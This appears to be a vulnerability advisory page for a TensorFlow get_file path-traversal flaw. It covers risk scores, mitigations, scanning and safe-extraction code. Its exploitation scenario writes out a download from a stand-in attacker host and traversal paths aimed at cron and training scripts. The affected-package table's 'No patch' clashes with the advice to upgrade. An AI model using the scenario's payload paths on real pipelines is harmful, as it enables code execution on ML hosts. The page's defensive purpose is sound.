CVE-2021-35958: TensorFlow: path traversal in get_file allows file overwrite

CRITICAL PoC AVAILABLE

Published June 30, 2021

CISO Take

Any ML pipeline using tf.keras.utils.get_file with extract=True against external or user-controlled URLs is vulnerable to zip-slip attacks that overwrite arbitrary files on the host, potentially escalating to code execution. Audit all pipeline code for this pattern immediately and replace with validated extraction logic. Upgrade to TensorFlow 2.6+ and treat all remote archives as untrusted input regardless of source.

What is the risk?

Critical (CVSS 9.1). No authentication or user interaction is required: attackers need only serve a malicious archive at a URL fetched by the ML pipeline. The file overwrite primitive elevates readily to code execution by targeting Python scripts, config files, or model artifacts. ML training pipelines routinely download external datasets and pre-trained models at scale, making the attack surface broader than in typical application CVEs. The vendor's position that the function 'isn't meant for untrusted archives' does not reduce operational risk where pipelines consume third-party datasets.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
TensorFlow	pip	through 2.5.0	No patch

Do you use TensorFlow? You're affected.

How severe is it?

CVSS 3.1

9.1 / 10

EPSS

1.9%

chance of exploitation in 30 days

Higher than 77% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV Network

AC Low

PR None

UI None

S Unchanged

C None

I High

A High
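
The 9.1 base score can be reproduced from the metrics above. The following is a minimal sketch that assumes the metric weights and round-up rule published in the CVSS v3.1 specification and handles only the Scope Unchanged case; the function and variable names are illustrative and not part of any library.

```python
import math

# Metric weights from the CVSS v3.1 specification (Scope Unchanged values for PR).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "CIA": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value: float) -> float:
    """Round up to one decimal place using the integer method from the spec."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score_scope_unchanged(av, ac, pr, ui, c, i, a) -> float:
    """Compute the CVSS v3.1 base score for a Scope Unchanged vector."""
    w = WEIGHTS
    iss = 1 - (1 - w["CIA"][c]) * (1 - w["CIA"][i]) * (1 - w["CIA"][a])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"][av] * w["AC"][ac] * w["PR"][pr] * w["UI"][ui]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


# AV:N / AC:L / PR:N / UI:N / S:U / C:N / I:H / A:H, as listed above.
score = base_score_scope_unchanged("N", "L", "N", "N", "N", "H", "H")
print(score)  # 9.1
```

The impact term comes entirely from Integrity and Availability (Confidentiality is None), which is why the score lands at 9.1 rather than the 9.8 that the same vector would produce with C:H.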

What should I do?

6 steps

1. Upgrade TensorFlow to 2.6.0 or later and review release notes for archive handling changes.
2. Audit all codebases for the pattern get_file(..., extract=True) combined with external or user-supplied URLs, and flag all instances for review.
3. Replace unsafe extraction with explicit archive member path validation: reject any member whose resolved path escapes the target directory. For Python's tarfile module, pass filter='data' to extractall (available in Python 3.12+ and backported to security releases of 3.8 through 3.11), or manually check for absolute paths and '..' sequences in member names.
4. Run ML pipeline processes under least-privilege OS accounts with minimal write permissions to model and data directories.
5. Implement file integrity monitoring on model artifacts and training data directories.
6. For detection: scan IaC and pipeline code with semgrep rules targeting get_file.*extract and tarfile.extractall without path filtering.
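
As a rough stand-in for the audit and detection steps, the sketch below uses Python's standard ast module rather than semgrep (a deliberate substitution, not the tooling named above). It flags any call to a function named get_file that passes an extract keyword not literally set to False. The helper name find_get_file_extract_calls and the sample source are hypothetical, and matching on the bare name get_file is an assumption that can produce false positives for unrelated functions.

```python
import ast


def find_get_file_extract_calls(source: str, filename: str = "<string>"):
    """Return (line_number, call_text) for get_file(...) calls that enable extract."""
    findings = []
    tree = ast.parse(source, filename=filename)
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        # Handle both tf.keras.utils.get_file(...) and a bare get_file(...).
        name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", None)
        if name != "get_file":
            continue
        for kw in node.keywords:
            literal_false = isinstance(kw.value, ast.Constant) and kw.value.value is False
            if kw.arg == "extract" and not literal_false:
                # ast.unparse requires Python 3.9 or later.
                findings.append((node.lineno, ast.unparse(node)))
                break
    return findings


# Hypothetical pipeline snippet used only to exercise the scanner.
sample = '''
import tensorflow as tf
path = tf.keras.utils.get_file("data.tar.gz", origin=url, extract=True)
safe = tf.keras.utils.get_file("weights.h5", origin=url)
'''

findings = find_get_file_extract_calls(sample)
for line, call in findings:
    print(f"line {line}: {call}")
```

A scanner like this only locates candidate call sites; whether the origin URL is external or user-controlled still has to be judged by a reviewer.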

How is it classified?

Tags: Supply Chain, Code Execution, Framework, Training Data

MITRE ATLAS: AML.T0010.001 - AI Software, AML.T0010.002 - Data, AML.T0011.001 - Malicious Package, AML.T0049 - Exploit Public-Facing Application

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Art. 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.6.2 - AI system use by external parties and third-party AI tools

NIST AI RMF

MS-2.5 - AI Software and Third-Party Component Risk Management

OWASP LLM Top 10

LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

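What is CVE-2021-35958?

CVE-2021-35958 is a path traversal (CWE-22) vulnerability in TensorFlow through 2.5.0: when tf.keras.utils.get_file is called with extract=True, a crafted archive can overwrite arbitrary files on the host.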

Is CVE-2021-35958 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2021-35958, increasing the risk of exploitation.

How to fix CVE-2021-35958?

1. Upgrade TensorFlow to 2.6.0 or later and review release notes for archive handling changes.
2. Audit all codebases for the pattern get_file(..., extract=True) combined with external or user-supplied URLs, and flag all instances for review.
3. Replace unsafe extraction with explicit archive member path validation: reject any member whose resolved path escapes the target directory. For Python's tarfile module, pass filter='data' to extractall (available in Python 3.12+ and backported to security releases of 3.8 through 3.11), or manually check for absolute paths and '..' sequences in member names.
4. Run ML pipeline processes under least-privilege OS accounts with minimal write permissions to model and data directories.
5. Implement file integrity monitoring on model artifacts and training data directories.
6. For detection: scan IaC and pipeline code with semgrep rules targeting get_file.*extract and tarfile.extractall without path filtering.

What systems are affected by CVE-2021-35958?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, data preprocessing pipelines, model loading and serving, CI/CD ML pipelines, notebook environments.

What is the CVSS score for CVE-2021-35958?

CVE-2021-35958 has a CVSS v3.1 base score of 9.1 (CRITICAL). The EPSS exploitation probability is 1.86%.

What is the AI security impact?

Affected AI Architectures

training pipelines, data preprocessing pipelines, model loading and serving, CI/CD ML pipelines, notebook environments

MITRE ATLAS Techniques

AML.T0010.001 AI Software

AML.T0010.002 Data

AML.T0011.001 Malicious Package

AML.T0049 Exploit Public-Facing Application

Compliance Controls Affected

EU AI Act: Art. 15

ISO 42001: A.6.2

NIST AI RMF: MS-2.5

OWASP LLM Top 10: LLM05

What are the technical details?

Original Advisory

TensorFlow through 2.5.0 allows attackers to overwrite arbitrary files via a crafted archive when tf.keras.utils.get_file is used with extract=True. NOTE: the vendor's position is that tf.keras.utils.get_file is not intended for untrusted archives.

Exploitation Scenario

An adversary registers a lookalike domain mimicking a popular ML dataset repository or compromises a legitimate one. They publish a malicious .tar.gz archive containing a crafted entry with a traversal path such as ../../app/train.py or ../../etc/cron.d/mlbackdoor. When the ML training pipeline executes tf.keras.utils.get_file('dataset.tar.gz', origin='https://malicious-host/dataset.tar.gz', extract=True), TensorFlow extracts the archive without validating member paths. The attacker's payload overwrites a training script or scheduled task, which executes during the next model run or system event. The result is persistent code execution on ML infrastructure with the pipeline's credentials and network access.
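
The member-path validation that is missing in this scenario can be sketched with Python's standard tarfile module. This is a minimal illustration under stated assumptions, not TensorFlow's own code: the helper names unsafe_members, safe_extract and build_demo_archive are hypothetical, the demo archive is built in memory with harmless content, and rejecting every symbolic or hard link is a deliberately conservative choice.

```python
import io
import os
import tarfile


def unsafe_members(archive: tarfile.TarFile, dest_dir: str):
    """List member names that would resolve outside dest_dir, plus any links."""
    root = os.path.realpath(dest_dir)
    flagged = []
    for member in archive.getmembers():
        # os.path.join discards root when member.name is absolute, so absolute
        # paths are caught by the same containment check as '..' sequences.
        target = os.path.realpath(os.path.join(root, member.name))
        if os.path.commonpath([root, target]) != root:
            flagged.append(member.name)
        elif member.issym() or member.islnk():
            # Conservative assumption: treat all links as unsafe.
            flagged.append(member.name)
    return flagged


def safe_extract(archive: tarfile.TarFile, dest_dir: str) -> None:
    """Extract only if no member escapes dest_dir; otherwise raise ValueError."""
    flagged = unsafe_members(archive, dest_dir)
    if flagged:
        raise ValueError(f"refusing to extract, unsafe members: {flagged}")
    if hasattr(tarfile, "data_filter"):
        # Extraction filters exist on this interpreter; use the 'data' filter too.
        archive.extractall(dest_dir, filter="data")
    else:
        archive.extractall(dest_dir)


def build_demo_archive() -> bytes:
    """Build an in-memory .tar.gz with one benign and one traversal entry."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name in ("data/train.csv", "../../app/train.py"):
            payload = b"demo"
            info = tarfile.TarInfo(name=name)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


with tarfile.open(fileobj=io.BytesIO(build_demo_archive()), mode="r:gz") as tar:
    flagged = unsafe_members(tar, "extract_here")
print(flagged)  # ['../../app/train.py']
```

Checking every member before extracting anything means a single bad entry rejects the whole archive, which avoids leaving a partially extracted dataset behind.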

Weaknesses (CWE)

CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Primary

CWE-22 — Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'): The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

[Implementation] Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation.
[Architecture and Design] For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Source: MITRE CWE corpus.